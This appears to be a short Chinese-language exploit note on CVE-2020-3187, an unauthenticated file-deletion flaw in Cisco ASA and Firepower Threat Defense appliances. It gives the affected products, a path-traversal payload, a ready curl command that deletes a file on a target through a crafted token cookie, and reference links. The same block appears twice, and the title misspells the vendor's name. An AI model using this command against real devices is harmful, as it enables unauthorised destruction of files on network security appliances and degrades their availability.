# Cicso未經驗證任意文件刪除漏洞 CVE-2020-3187
==影響系統:==
Cisco Adaptive Security Appliance
Cisco Firepower Threat Defense Software
==POC:==
舉例爲刪除LOGO文件:
payload:
/+CSCOU+/csco_logo.gif
執行:
curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://target/+CSCOE+/session_password.html
==更多:==
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3187
https://blog.rapid7.com/2020/05/08/may-2020-cisco-remote-vulnerabilities-guidance/
https://twitter.com/aboul3la/status/1286809567989575685
==影響系統:==
Cisco Adaptive Security Appliance
Cisco Firepower Threat Defense Software
==POC:==
舉例爲刪除LOGO文件:
payload:
/+CSCOU+/csco_logo.gif
執行:
curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://target/+CSCOE+/session_password.html
==更多:==
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3187
https://blog.rapid7.com/2020/05/08/may-2020-cisco-remote-vulnerabilities-guidance/
https://twitter.com/aboul3la/status/1286809567989575685
https://github.com/pry0cc/CVE-2020-3187
https://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html
请登录后查看评论内容